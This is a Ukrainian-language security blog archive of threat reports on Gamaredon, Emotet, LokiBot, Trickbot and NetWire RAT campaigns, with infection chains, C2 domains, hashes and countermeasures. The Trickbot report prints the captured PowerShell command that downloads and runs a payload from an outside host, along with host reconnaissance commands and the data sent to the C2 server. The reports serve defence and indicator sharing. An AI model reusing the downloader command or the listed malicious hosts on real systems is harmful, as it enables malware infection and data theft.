Tag Archive | macro

IOC_Gamaredon_181119

From Russia, with Love документами із піратським офісом*

Типовий день дослідника malware, поспішиш – закриють С2

Панове, бажаю здоров’я.

Вчора було зафіксовано розсилку шкідливих документів від угрупування Gamaredon APT, яке пов’язують з РФ.
Рівень загрози – високий.
Нагадую, що Gamaredon APT – команда, що спеціалізується на розповсюдженні імплантів в системах Українських організацій.

Схема:
————–
email attach .zip > .docx > xml.rels > GET .dot > macro > DROP vbs > WSH > 3d stage ..

Давайте розглянемо детально, які засоби застосовують проти нас люди з Gamaredon:

#1 Зміст документу-приманки

Підбирається під конкретну ціль. Ось кілька прикладів за осінь 2019го: (збільшене зображення по кліку)

Інформпривід або створюється штучно із залученням реальних прізвищ/посад , або ж за основу беруть документи з відкритого доступу. По рівню згенерованого контенту вони конкурують та значно випереджають те, що ми вже бачили у розсилках Sobaken.

#2 Перший файл – приманка

Конкретний зразок із розсилки за 18/11/19 є автоматично згенерованим на базі шаблону (час редагування – 2хв, дата збереження навмисно спотворена 1980й). *Також можна помітити, що пакет MS Office, в якому формували дану приманку зареєстрований на псевдо компанію “Reanimator Extreme Edition“, що є маркером піратської копії:

Документ містить вразливість CVE-2017-0199, у одному з його xml файлів вставили посилання на зовнішнє джерело:

Вразлива версія MS Office без виправлень при відкритті такого файлу одразу спробує завантажити файл за вказаним посиланням. Зауважте, що процес MS Word перед завантаженням перевіряє доступність файлу запитами із специфічним User Agent:

#3 Другий файл – dropper

Файл, який завантажується при обробці xml.rels, створений тим же “автором” у тому ж піратському офісі:

Цей файл містить макрос:

Завдання макросу – згенерувати VBS файл із унікальним посиланням для зв’язку з С2:

та забезпечує його закріплення в системі через каталог Startup:

Важливо – вони не використовують 11882, powershell чи закріплення через реєстр, бо ці трюки вже більшість ІТ\ІБ блокують або відстежують. Натомість Gamaredon намагається застосовувати старіші техніки, аби лишатися у тіні.

#4 Скрипт закріплення – downloader

VBS скрипт, який було згенеровано макросом із другого файлу відповідає за комунікацію із розгалуженою системою С2. Особливість у тому, що для з’єднання макрос на кожній системі генерує пару “Hostname+ID” і додає її у URL:

С2 використовують домени із зони ddns.net, ось частковий перелік “засвічених”:

unhcr.ddns.net
rnbo-ua.ddns.net
network-crash.ddns.net
checkhurl.site
get-icons.ddns.net
bitvers.ddns.net
shell-sertificates.ddns.net
bitread.ddns.net
sv-menedgment.ddns.net
lookups.ddns.net
libresoft.ddns.net
document-write.ddns.net
suipost.ddns.net
document-listing.ddns.net
list-sert.ddns.net
military-ua.ddns.net
const-gov.ddns.net
my-certificates.ddns.net
checkhurl.fun
libre-boot.ddns.net
kristo-ua.ddns.net
templates.hopto.org
checkhurl.website
constructor-word.ddns.net
creative-office.ddns.net
kornet-ua.ddns.net
duktas-dde.ddns.net
message-office.ddns.net
unhcr.ddns.net
shell-sertificates.ddns.net
network-crash.ddns.net
message-office.ddns.net
list-sert.ddns.net
libresoft.ddns.net
kristo-ua.ddns.net
kornet-ua.ddns.net
bitread.ddns.net
micro-office.ddns.net
get-icons.ddns.net
checkhurl.space
checkhurl.info
checkhurl.fun
checkhurl.site
underlord.site
underlord.fun
bitvers.ddns.net
sv-menedgment.ddns.net
lookups.ddns.net
document-write.ddns.net
suipost.ddns.net
document-listing.ddns.net
military-ua.ddns.net
rnbo-ua.ddns.net
const-gov.ddns.net
my-certificates.ddns.net
libre-boot.ddns.net
underlord.space
templates.hopto.org
checkhurl.website
constructor-word.ddns.net
creative-office.ddns.net
duktas-dde.ddns.net

#5 Імплант

С2 віддає імплант лише короткий проміжок часу та перевіряє параметри систем які звертаються до нього. Через це мені так і не вдалося отримати сам файл імпланту. На що це може бути схожим варто подивитися у дописі дослідника Vitali KremezDeeper Dive into Gamaredon Group Pteranodon Implant Version ‘_512’

Доречним буде скористатися YARA правилом:

rule apt_win32_gamaredon_pteranodon_initial_sfx {
   meta:
      author = "@VK_Intel"
      reference = "Detects Gamaredon Group Pteranodon Implant"
      date = "2018-12-27"
      type = "experimental"
   strings:
      $s0 = "cryptcp.exe" fullword wide
      $s1 = "SFX module - Copyright (c) 2005-2012 Oleg Scherbakov" fullword ascii
      $s2 = "7-Zip archiver - Copyright (c) 1999-2011 Igor Pavlov" fullword ascii
      $s3 = "RunProgram=\"hidcon" fullword ascii
      $s4 = "7-Zip - Copyright (c) 1999-2011 " fullword ascii
      $s5 = "sfxelevation" fullword wide
      $s6 = "Error in command line:" fullword ascii
      $s7 = "%X - %03X - %03X - %03X - %03X" fullword wide
      $s8 = "- Copyright (c) 2005-2012 " fullword ascii
      $s9 = "Supported methods and filters, build options:" fullword ascii
      $s10 = "Could not overwrite file \"%s\"." fullword ascii
      $s11 = "7-Zip: Internal error, code 0x%08X." fullword ascii
      $s12 = "@ (%d%s)" fullword wide
      $s13 = "SfxVarCmdLine0" fullword wide
      $s14 = "SfxVarCmdLine1" fullword wide
      $s15 = "SfxVarCmdLine2" fullword wide
      $cmd = ".cmd" fullword wide
condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and 14 of them and $cmd) }

позичено у @VK_Intel

Аналітика:
————–

  • Зауважте, що 4 спроби аналізу не дали 3го кроку – саме тіло імпланту так і не було отримано
  • Те, що ви бачите о звіті – це лише перші 2 кроки інфікування
  • Доставка – через документи-приманки із вразливістю CVE-2017-0199 з подальшим довантаженням документу з макросом (AutoOpen)
  • Макрос виконує одну задачу – формує VBS файл з інструкціями (Downloader) та забезпечує його закріплення через каталог Startup
  • Зверніть прискіпливу увагу на мережеві маркери – за цими двома IP тягнеться шлейф різних доменів (різні профілі жертв)
  • Проблеми будуть утих, хто не оновлює MS Office та не контролює WSH (wscript.exe)
  • VBS формує унікальний URL для кожної інфікованої системи (ім’я + ідентифікатор)

Мережеві маркери:
————–
141.8.195.60 win-apu.ddns{.} net GET /apu.dot UA = Mozilla/4.0
2.59.41.5 get-icons.ddns{.} net GET /Host_ID//autoindex.php UA = Mozilla/4.0

Звіт:
————–
https://pastebin.com/Vhb4KF5L

Контрзаходи:
————–

  • Блок двох IP адрес, наданих вище та контроль спроб resolve сайтів з зони ddns.net
  • Оновлення MS Office, виправлення вразливості CVE-2017-0199 (патчі за 2017-й рік!)
  • Деактивація Windows Script Host або блок запуску ?script.exe або блок мережевого трафіку для ?script.exe (див. стаття#1 та стаття#2)
  • Заборона запуску макросів там, де вони не потрібні
  • Повне блокування доступу до Інтернет для MS Word, Excel та PowerPoint
  • Або ж блокування на Proxy специфічних User Agent MS Office Web-Dav
  • Контроль списку автозавантаження
  • Користувачі McAfee VSE/ENS у безпеці (GTI)

Будьте уважні та обережні.

VR

Хитрий emotet

Люди, котрі заробляють на життя фішингом/розповсюдженням malware постійно вдосконалюють свої навички.

Ті, хто захищають інформаційні системи, повинні швидко адаптуватися під зміни методів доставки.

 

Сьогодні я розкажу вам про трюк, який дозволяє актуальним приманкам обходити _деякі_ sandbox.

А для тих, хто дочитає до кінця, буде бонусний контент ;)

Вступ

PowerShell вже кілька років є улюбленим помічником зловмисників для завантаження та запуску payload.

З 2017го року, відсоток приманок, що застосовують PowerShell тільки збільшується.

З початком 2019го року я стикнувся з тим, що на одній із моїх тестових машин приманка із макросом не відпрацювала повний цикл.

 

Суть

Отже це був черговий зразок банківського трояну #emotet.

В якості приманки використали XML файл із макросом, який мав передати на powershell інструкції – де взяти payload, куди завантажити і як запустити.

Але під час динамічного виконання послідовність команд дивним чином обривалася:

Я не міг збагнути, чому інфікування не проходить.

Отже я спробував скопіювати перехоплений рядок обфускованих інструкцій і запустити його через cmd вручну:

Виявилося, що виконання математичних операцій із масивами (досить поширений варіант обфускації) саме на цій тестовій системі

призводило до генерування команди із помилкою – ‘powershtll’ замість ‘powershell’:

Через це послідовність атаки і зупинялася.

Що ж, принаймні тепер я мав адреси джерел payload, які одразу ж перевірив:

Вони навіть не приховали payload під виглядом графічного файлу (так як це роблять при розповсюдженні #shade).

Отримавши зразки payload я одразу ж перевірив їх на приналежність конкретного виду за допомогою сервісу INTEZER Analyze:

Але мені не давало спокою, чому ж той скрипт із приманки не відпрацював докінця?

Кілька хвилин моніторингу і я знайшов причину у дописі My Online Security ‏ @dvk01uk

Як виявилося, скрипт не відпрацював через застарілу версію PowerShelll.

Справа у тім, що на Windows 7 PS не оновлюється автоматично.

А інструкції, які були у коді макросу, використовували змінні, котрі не працюють на версіях старіших за 5-ту.

 

Мій трюк (костиль)

Оскільки замовнику необхідно було надати перелік маркерів (IOC) якнайшвидше, я не став витрачати час на заміну тестового середовища

чи оновлення PowerShell.

Ось що я зробив – я знав, що команда обривається через помилку і назві запускного файлу powershell.

Мені потрібен був аліас на powershtll який би викликав powershell.

За допомогою google я згадав про таку корисну функцію як DOSKEY і нашвидкоруч створив аліас:

Це дало мені змогу запустити процес виконання скрипту і отримати результат:

Так, це костиль. І для іншого зразка із зміненою обфускацією він не працюватиме.

Але це дозволило мені вкластися у штатні 40 хв на аналіз зразка і надати замовнику маркери – https://pastebin.com/D9TDts5J.

– – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – –

Отже мораль цієї історії наступна – подбайте про оновлення ваших тестових ВМ у sandbox

та переконайтеся, що актуальні схеми обфускації відпрацьовують схему інфікування до кінця.

Інакше ви ризикуєте пропустити загрозу і втратити дані із скомпрометованої системи.

Висновки

  • PowerShell і надалі будуть застосовувати для доставки і запуску malware
  • На тестових Windows 7 потрібно оновити PS до 5ї версії
  • Варто очікувати нових способів обфускації
  • Від так необхідно обмежувати запуск вбудованих інструментів Windows для простих користувачів

PS

– – –  // Бонусний контент для уважних та допитливих

McAfee створило непогане відео про #emotet в якому показали як правилами Access Protection вберегти користувачів від зараження

Користуйтеся:

– – –  // Бонусний контент для уважних та допитливих

Будьте уважні та обережні.

VR

IOC_Emotet_091118

09/11/18 проходила розсилка троянського шкідливого коду типу #Emotet
Метод доставки – документ із макросом з передачею команд на powershell.
Ступінь загрози – високий (для компаній, що не блокують макроси).

  • Сильна обфускація команд.

5 різних джерел, три із них поки що активні:

h11p\мягкое-стекло{.} рф/OYRECjhJU  404
h11p\sastudio{.} co/GgGV3mOVlN           200
h11p\priscawrites{.} com/tS6M2ffhC       200
h11p\gbsbrows{.} com/JZLqJd4                200
h11p\evelin{.} ru/fgARtN6g                       404

Мережеві маркери:
– – – – – – – – – – – – – – – – – –
132.148.254.223 gbsbrows{.} com GET /JZLqJd4 HTTP/1.1 no User Agent
187.163.174.149 187.163.174.149:8080 GET / HTTP/1.1 Mozilla/4.0
# # #

Більше маркерів (чорновик звіту) за посиланням:
https://pastebin.com/THHMs2wg

Додаткові маркери по іншим розсилкам:

https://pastebin.com/KVNyw9Uq

https://pastebin.com/L2nSzNU4

Контрзаходи:

  • Заборонити виклик/передачу команд на cmd та powershell від додатків MS Office
  • Блокувати на proxy запити з пустим або нетиповим полем User Agent
  • Заборонити на proxy завантаження додатків
  • Контролювати створення/запуск .exe у профілях користувачів

Будьте уважні та обережні.

VR

IOC_lokibot_161018

16/10/18 проходила розсилка #lokibot

Схема:
email > attach XLS > VBA > powershell > GET > %userprofile%\MyP8Mihuih.exe

Мережеві маркери:
– – – – – – – – – – – – – – – – – –
181.174.165.161 octap{.} igg{.} biz GET /01/chri1.jpg HTTP/1.1 (!) no User Agent
103.109.184.60 octone{.} igg{.} biz POST /chri1/cgi.php HTTP/1.0 (!) Mozilla/4.08 (Charon; Inferno) < #Lokibot User Agent
# # #

Більше маркерів (чорновик звіту) за посиланням:
https://pastebin.com/LPqjHUkQ

Контрзаходи:

• Блокуйте запуск макросів
• Контролюйте нетипові виклики powershell
• Контролюйте трафік powershell
• Забороняйте/контролюйте створення .exe у C:\Users\
• Блокуйте на Proxy нетипові User Agent.

Будьте уважні та обережні.

VR

malware

Невивчені уроки або логи антивірусних війн

12/07/18 доповідав про наші досягнення у розрізі аналізу шкідливого коду та методів його доставки.

Контент суто технічний. Без прив’язки до конкретних вендорів чи рішень.

Презентацію можна переглянути/взяти тут

Основні тези:

  • Поточні ситуація по атакам (масові)
  • Гучні атаки 2017го (wcry, xdata, eternalpetya, badrabbit…)
  • Не правильні висновки
  • Реагування на інциденти
  • Технічні моменти захисту

Розповів про типові помилки при реагуванні на інциденти та навів приклади дієвих контрзаходів.

Кому зі slideshare не зручно – беріть у вигляді pdf (~4 Mb)

Сподіваюсь, знання стануть у нагоді.

Будьте уважні та обережні.

VR

IOC_Trickbot_110618

Доброго ночі, панове.

Перепрошую, що турбую в неробочий час, але інформація важлива.

В минулий понеділок, 11го числа, після обіду походила розсилка документів з макросами,

активація яких призводила до інфікування систем трояном типу #Trickbot.

Ми отримали зразок фішингового листа від однієї з компаній лише кілька годин тому:

Приманка досі функціонує, а основне тіло активно передає інформацію з інфікованих систем.

Шість днів поспіль вони продовжують збирати інформацію.

Так, уже майже усі антивіруси внесли і документ і payload в свої сигнатури.

Але ми дбаємо про вас, тому вирішили надати звіт із маркерами щоб ви могли пересвідчитися, що ваші системи ця зараза оминула.

Нагадую, що #Trickbot є модульним ШПЗ, яке використовується для збору даних та стеження.

Може довантажувати різні модулі для шифрування або віддаленого керування.

Рівень загрози, для організацій котрі не блокують макроси та не контролюють PowerShell і створення .exe, – високий.

А для тих, хто уважно читає наші поради – низький.

На що треба звернути увагу:

  • Один із серверів, що розповсюджує частини malware досі активний
  • Завантаження payload силами powershell через його виклик з cmd
  • Шлях та ім’я з яким записується і запускається downloader чітко вказані (not random)
  • Payload не кодований (!This program cannot be run in DOS mode.)
  • Виконання проходить із затримкою ~2-3 хв
  • Зразок не зачищає за собою файли у %temp% після міграції в %apdata%
  • Перевірку IP та звернення до Windows Update здійснює процес Oeuin_r.exe
  • Зразок також довантажує з windowsupdate.com кореневі сертифікати
  • А от передача зібраних даних уже через інжектований svchost
  • Прав Адміністратора не потребує

І так, проблеми будуть у тих, хто:

  • Не блокують макроси (90% державних установ)
  • Не заборонили завантаження через powershell (більше 50% організацій)
  • Не заборонили мережевий трафік для powershell (більше 50% організацій)
  • На блокують несанкціоноване завантаження додатків з робочих систем (50% організацій)
  • Не блокують створення та запуск нових .exe з каталогів C:\Users\**\*.exe (70% установ)

 Схема атаки:

Email attach (.doc) > macro > cmd > powershell > 2 URL > GET no.bin > %temp%\Oeuin_r.exe

Маркери IOC:

документ

SHA-256        5e7a1ed5f9a1fbc9d7148fbc28a379dc0067508844b6d342084d26b75c995d4f
File name   75812277127A00113A.doc
File size      69 KB

Макрос містить 2 URL:

h11p:\onetimewonders{.} com/no.bin    (!) досі активний

h11p:\nepalhiking{.} com/no.bin           (404) файл вже видалено

сновна частина

SHA-256    503c5c3cb68e1e057df4b99fe338d65d44d4c6e1f49396929d3fff66044505af
File name   no.bin       >> %temp%\Oeuin_r.exe        !This program cannot be run in DOS mode.
File size      338 KB

Відкриває з’єднання із С2

h11p\188.124.167.132:8082/ser0611/hostname.UID

Активність по процесам:

"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde

"C:\Windows\System32\cmd.exe" /c PowerShell "'PowerShell ""function mhioxqxcz1([String] $lcambw5)

{(New-Object System.Net.WebClient).DownloadFile($lcambw5,''C:\tmp\Oeuin_r.exe'');

Start-Process ''C:\tmp\Oeuin_r.exe'';}try{mhioxqxcz1(''h11p\onetimewonders{.} c0m/no.bin'')}catch{mhioxqxcz1(''h11p\nepalhiking{.} c0m/no.bin'')}'""

| Out-File -encoding ASCII -FilePath C:\tmp\wcwwirbmn.bat;Start-Process 'C:\tmp\wcwwirbmn.bat' -WindowStyle Hidden"

C:\Windows\SysWOW64\cmd.exe cmd /c ""C:\tmp\wcwwirbmn.bat" "

PowerShell  "function mhioxqxcz1([String] $lcambw5){(New-Object System.Net.WebClient).

DownloadFile($lcambw5,'C:\tmp\Oeuin_r.exe');

Start-Process 'C:\tmp\Oeuin_r.exe';}try{mhioxqxcz1('h11p\onetimewonders{.} c0m/no.bin')}catch{mhioxqxcz1('h11p\nepalhiking{.} c0m/no.bin')}

"C:\tmp\Oeuin_r.exe"

C:\Users\operator\AppData\Roaming\coplane\Oeuin_s.exe

C:\Windows\system32\svchost.exe

Збір інформації вбудованими засобами ОС:

C:\Windows\system32\cmd.exe /c ipconfig /all

C:\Windows\system32\cmd.exe /c net config workstation

C:\Windows\system32\cmd.exe /c net view /all

C:\Windows\system32\cmd.exe /c net view /all /domain

C:\Windows\system32\cmd.exe /c nltest /domain_trusts

C:\Windows\system32\cmd.exe /c nltest /domain_trusts /all_trusts

Закріплення через планувальник задач:

\MsWinToken      c:\users\operator\appdata\roaming\coplane\oeuin_s.exe        11.06.2018 10:46

Мережеві IOC:

Завантаження основного тіла:

68.65.120.85      onetimewonders{.} c0m       GET /no.bin HTTP/1.1

Перевірка Public IP:

216.239.32.21    ipinfo.io     GET /ip      HTTP/1.1    Mozilla/5.0

Комунікація з Windows Update (довантаження кореневих сертифікатів):

91.223.19.232    www.download.windowsupdate.com       GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1   Microsoft-CryptoAPI/6.1

Трафік інфікованої системи:

svchost.exe 2948 TCP   216.239.32.21    80     ESTABLISHED

svchost.exe 2948 TCP   200.111.167.227 449   ESTABLISHED

svchost.exe 2948 TCP   91.223.19.232    80     ESTABLISHED

svchost.exe 2948 TCP   37.230.113.54    447   ESTABLISHED

svchost.exe 2948 TCP   200.111.167.227 449   ESTABLISHED

svchost.exe 2948 TCP   65.30.201.40      443   SYN_SENT

Передача інформації про інфіковану систему:

188.124.167.132:8082         POST /ser0611/hostname_UID HTTP/1.1 test

А тепер саме головне – яку інформацію отримують нападники:

POST /ser0611/APM11_W617601.66340B99AFAFEB9431CE688A2D6B8FF8/90 HTTP/1.1

Content-Type: multipart/form-data; boundary=Arasfjasu7

User-Agent: test

Host: 188.124.167.132:8082

Content-Length: 4941

Cache-Control: no-cache

–Arasfjasu7

Content-Disposition: form-data; name=”proclist”

 

***PROCESS LIST***

[System Process]

System

smss.exe

csrss.exe

wininit.exe

csrss.exe

winlogon.exe

services.exe

lsass.exe

lsm.exe

–Arasfjasu7

Content-Disposition: form-data; name=”sysinfo”

 

***SYSTEMINFO***

Host Name – APM11

OS Name – Microsoft Windows 7 ……………………..

OS Version – Service Pack 1

OS Architecture – 64-bit

Product Type – Workstation

Build Type – Multiprocessor Free

Registered Owner – operator

Registered Organization –

Serial Number – 55041-007-1767687-86688

Install Date – 30/12/1899 00.00.00

Last Boot Up Time – 30/12/1899 00.00.00

Windows Directory – C:\Windows

System Directory – C:\Windows\system32

Boot Device – \Device\HarddiskVolume1

Total Physical Memory – 3651 Mb

Available Physical Memory – 3651 Mb

/c ipconfig /all

Ethernet adapter eth0:

….

/c net config workstation

…… ………………..                                \\APM11

………… …… ………………..                         APM11

…… ……………………                              operator

/c net view /all

.. ………… …… ……………….

/c net view /all /domain

.. ………… …… ……………….

/c nltest /domain_trusts

…. ………….. …………………. ………….. …………: Status = 1717 0x6b5 RPC_S_UNKNOWN_IF

/c nltest /domain_trusts /all_trusts

…. ………….. …………………. ………….. …………: Status = 1717 0x6b5 RPC_S_UNKNOWN_IF

–Arasfjasu7–

Контрзаходи:

  • Перевірка журналів мережевого обладнання на наявність з’єднань із С2
  • Блокування несанкціонованої доставки запускних на рівні Web та Email шлюзів
  • Перевірка каталогів
    • %temp%\Oeuin_r.exe
    • %temp%\wcwwirbmn.bat
    • %appdata%\coplane\Oeuin_s.exe
  • Перевірка планувальника системи на наявність задачі \MsWinToken         c:\users\%жертва%\appdata\roaming\coplane\oeuin_s.exe
  • По можливості – відмова від макросів
  • Заборона запуску дочірніх процесів для додатків MS Office, mshta.exe, powershell та cmd – користувацьке правило Access Protection (McAfee ENS)
  • Заборона специфічного виклику PowerShell та виконання кодованих команд – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • Заборона мережевої активності для PowerShell – правило вбудованого брандмауеру (по аналогії з варіант1)
  • Моніторинг (хоча б) та\або блокування створення (або хоча би запуску) нових *.EXE файлів у каталогах C:\Users\**\
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_NetWire_RAT_250418

Доброго дня, панове.

Детальний звіт по сьогоднішній розсилці.

Цього разу через документи із макросами розповсюджували #NetWire RAT.

Цей тип шкідливого коду застосовується для віддаленого керування інфікованими системами.

Рівень загрози, для організацій котрі не блокують макроси, – високий, а для тих, хто уважно читає наші поради – низький.

Трохи аналітики:

  • Документ із макросом розмістили на Amazon AWS (знову, для обходу URL фільтрації)
  • Активація макросу відбувається при кліку на формі (Ок або “Х”)
  • Payload не кодований (!This program cannot be run in DOS mode.)
  • Завантаження та запуск основної частини відбувається процесом winword
  • Основна частина зберігається у %Public% (фактично обходять %Temp%)
  • Не потребує прав Адміністратора

Інфікування відбувається так:


І так, проблеми будуть у тих, хто:

  • Не заблокували макроси (90% держ. установ та фінансових департаментів)
  • Не заборонили трафік для winword.exe (більше 50% організацій)
  • На блокують завантаження додатків з робочих систем (50% організацій)
  • Не блокують створення та запуск нових .exe з каталогів C:\Users\**\*.exe (70% установ)


Схема атаки:

email > URL > GET .doc > maco > GET 84.200.19.153/pen.exe > users\public\.exe

Маркери IOC:

файл приманка

SHA-256    16947cceab56ad5c98a588a23c656b8fc967702d027f8f9a0164bfc2738fc2b6
File name   Transactions_invalid001.doc
File size      425.5 KB

основна частина

SHA-256        079e3875726e57824b5357583a9ba746c5775a60c6355f5cced8024652817699
File name   pen.exe
File size      412 KB

Мережеві IOC:

Документ завантажується із Amazon AWS: (Увага! Посилання досі активне!)

h11ps://secured-banking00129.s3.amazonaws{.} com/Transactions_invalid001.doc

Основна частина завантажується із:

84.200.19.153    GET /pen.exe HTTP/1.1         Mozilla/4.0

Трафік скомпрометованої системи після запуску основної частини:

185.117.74.8      49622 → 4590 [SYN] Seq=0 Win=8192 Len=0 MSS=1460 WS=256 SACK_PERM=1    TCP   66    

Активність по процесам:

Коли жертва відкриває завантажений документ-приманку запускається макрос.

Процес Winword відкриває з’єднання із 84.200.19.153 і намагається завантажити некодований payload.

Завантажений файл записується та запускається з каталогу %Public%

"C:\Program Files\Microsoft Office\Office12\WINWORD.EXE" /n /dde
"C:\Users\operator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\...\pen[1].exe"
"C:\Users\Public\.exe"

Після запуску основна частина закріплюється через HKU:

[HKEY_USERS\S-xxx\Software\Microsoft\Windows\CurrentVersion\Run]
@="C:\\Users\\Public\\.exe"
"printer"="C:\\Users\\Public\\.exe"

(Default)    c:\users\public\.exe     4/24/2018 4:12 PM     
printer      c:\users\public\.exe     4/24/2018 4:12 PM 

Після запуску зразок відправляє SYN пакети на порт 4590 хоста 185.117.74.8:

185.117.74.8      49622 → 4590 [SYN]

Контрзаходи:

  • Перевірити журнали обладнання на наявність спроб комунікації із s3.amazonaws{.} com
  • Заборонити запуск макросів, якщо не використовуєте по роботі
  • Заборонити мережевий трафік для додатків MS Office – правило вбудованого брандмауеру (по аналогії з варіант1)
  • Заборонити запуск дочірніх процесів для додатків MS Office (крім служби друку) користувацьке правило Access Protection (McAfee ENS)
  • Чіткий контроль та блокування спроб зміни списку автозавантаження – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • Заборона створення та зчитування/запуску *.EXE файлів з каталогів профілю C:\Users\**\
  • Моніторинг (хоча б) та\або блокування створення (або хоча би запуску) нових *.EXE файлів у каталозі C:\Windows\Temp\**
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR